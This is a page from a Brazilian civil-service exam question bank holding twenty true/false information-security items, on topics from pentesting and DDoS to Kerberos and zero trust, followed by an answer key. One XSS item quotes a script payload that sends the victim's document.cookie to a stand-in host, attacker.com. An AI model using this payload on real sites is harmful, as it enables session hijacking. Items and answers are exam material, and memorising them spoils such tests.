Questões de Concurso Comentadas sobre segurança da informação

Foram encontradas 13.345 questões

Q1616651 Segurança da Informação
Julgue o seguinte item, a respeito de testes de invasão (pentest) em aplicações web, banco de dados, sistemas operacionais e dispositivos de redes.

O guia de testes do OWASP enumera verificações para cerca de setenta vulnerabilidades, agrupadas em classes, como a de gerenciamento de sessões, que trata de erros na implementação das regras de negócio.
Alternativas
Q1616650 Segurança da Informação
Julgue o seguinte item, a respeito de testes de invasão (pentest) em aplicações web, banco de dados, sistemas operacionais e dispositivos de redes.
Antes de iniciar o teste de invasão, deve-se ter um contrato assinado entre as partes envolvidas, para definir o escopo da atividade, os tipos de testes a serem realizados e a autorização para sua execução.
Alternativas
Q1616648 Segurança da Informação

Acerca de ataques do dia zero (zero day attacks), julgue o item que se seguem.


As melhores práticas estabelecem que, para combater a disseminação de zero days, as organizações podem publicar um processo de vulnerabilidades, mantendo relatórios de segurança e triagem dos problemas reportados internamente.

Alternativas
Q1616647 Segurança da Informação

Acerca de ataques do dia zero (zero day attacks), julgue o item que se seguem.


Em um mundo digital, exploits zero-day são amplamente encontrados, sendo desnecessário conhecimento técnico elaborado para os hackers descobrirem novas brechas, porque a maioria dos usuários não atualiza seus equipamentos com frequência.

Alternativas
Q1616646 Segurança da Informação

Acerca de ataques do dia zero (zero day attacks), julgue o item que se seguem.


Exploits zero-day atacam brechas que ainda são desconhecidas pelos fabricantes de software e pelos fornecedores de antivírus; não existem nem assinaturas de antivírus para detectar tal exploit nem atualizações disponíveis para reparar as brechas.

Alternativas
Q1616643 Segurança da Informação

Acerca de ataques a roteadores e switches, julgue o item subsequente.


Em um ataque ao STP (Spanning Tree Protocol), o atacante transmite um BPDU (bridge protocol data unit) de alteração de configuração ou de topologia de STP.

Alternativas
Q1616642 Segurança da Informação

Acerca das características de ataques de negação de serviço distribuído (DDoS), julgue o item a seguir.


Um ataque DDoS que utiliza protocolo DNS caracteriza-se por usar servidores de nomes para transformar consultas pequenas em cargas úteis muito maiores na resposta redirecionada à vítima.

Alternativas
Q1616641 Segurança da Informação
Acerca das características de ataques de negação de serviço distribuído (DDoS), julgue o item a seguir.
A mitigação de ataques DDoS é trivial se existir um web application firewall na frente da aplicação atacada.
Alternativas
Q1616640 Segurança da Informação

No que se refere a técnicas de backup de dados, julgue o item seguinte.


Um sistema de backup diferencial permite o salvamento apenas dos dados que tiverem sido alterados desde o último backup completo.

Alternativas
Q1616639 Segurança da Informação

No que se refere a técnicas de backup de dados, julgue o item seguinte.


Um sistema de backup incremental é capaz de armazenar os dados alterados desde um ponto de referência no tempo.

Alternativas
Q1616632 Segurança da Informação
Acerca do protocolo Kerberos, que implementa diversos mecanismos de autenticação, julgue o item a seguir.

No Kerberos, o tíquete de concessão (TGT) possui carimbo de hora, mas é enviado em texto claro.
Alternativas
Q1616631 Segurança da Informação
Acerca do protocolo Kerberos, que implementa diversos mecanismos de autenticação, julgue o item a seguir.

No passo básico de autenticação do Kerberos, o cliente se autentica no servidor de autenticação, que, por sua vez, encaminha o nome de usuário para um centro de distribuição de chaves.
Alternativas
Q1616630 Segurança da Informação

Julgue o próximo item, a respeito de gerência de riscos.


Risco é o efeito da incerteza nos objetivos, sendo normalmente expresso em termos de fontes de risco, eventos potenciais, suas consequências e suas probabilidades.

Alternativas
Q1616629 Segurança da Informação

Julgue o próximo item, a respeito de gerência de riscos.


Para gerenciar riscos, devem-se considerar os contextos externo e interno da organização, salvo o comportamento humano.

Alternativas
Q1616628 Segurança da Informação
Acerca de topologia segura, julgue os itens a seguir, tendo como referência o modelo confiança zero (zero trust model).

O modelo confiança zero estabelece que, depois de um usuário ser autenticado, devem-se fornecer a ele todos os acessos.
Alternativas
Q1616627 Segurança da Informação
Acerca de topologia segura, julgue os itens a seguir, tendo como referência o modelo confiança zero (zero trust model).

Uma rede de confiança zero pressupõe que haja invasores dentro e fora da rede, por isso nenhum usuário ou máquina deve ser automaticamente confiável.
Alternativas
Q1616626 Segurança da Informação
Com relação às políticas de auditoria na gestão de segurança da informação, julgue o item seguinte, com base no Decreto n.º 9.637/2018.
O referido decreto estabelece que qualquer auditoria de segurança da informação deve ser autorizada pelo gestor de tecnologia da informação do órgão.
Alternativas
Q1616625 Segurança da Informação
Com relação às políticas de auditoria na gestão de segurança da informação, julgue o item seguinte, com base no Decreto n.º 9.637/2018.
Cabe aos órgãos e às entidades da administração pública federal, em seu âmbito de atuação, analisar os resultados dos trabalhos de auditoria sobre a gestão de segurança da informação.
Alternativas
Q1616621 Segurança da Informação
Julgue os item seguinte, a respeito de respostas a incidentes, desenvolvimento de software e configuração de servidores.
É correto firmar que, a seguir, é ilustrado o conteúdo típico de um arquivo de log de um serviço de email, obtido por meio do comando more /var/log/maillog.
Aug 10 14:14:01 localhost sendmail[4768]: h7ALE1t04 763: [email protected], ctladdr=apache (48/48 ), delay=00:00:00, xdelay=00:00:00, mailer=esmtp, p ri=31300, relay=mx1.mail.yahoo.com. [64.157.4.78], d sn=2.0.0, stat=Sent (ok dirdel)
Alternativas
Q1616617 Segurança da Informação

Considere, ainda, que um atacante tenha alterado o parâmetro CC no browser pelo código a seguir.


><script>document.location=

'http://www.attacker.com/cgi-bin/cookie.cgi?

foo='+document.cookie</script>

Nesse caso, o risco de segurança da aplicação é a desserialização insegura.


Muitas aplicações web e APIs não protegem de forma adequada dados sensíveis, como dados financeiros, de saúde ou de identificação pessoal, por isso, para sua proteção, é necessário classificar os dados processados, armazenados ou transmitidos pela aplicação.

Alternativas
Respostas
7201: E
7202: C
7203: C
7204: E
7205: C
7206: C
7207: C
7208: E
7209: C
7210: C
7211: E
7212: C
7213: C
7214: E
7215: E
7216: C
7217: E
7218: C
7219: C
7220: C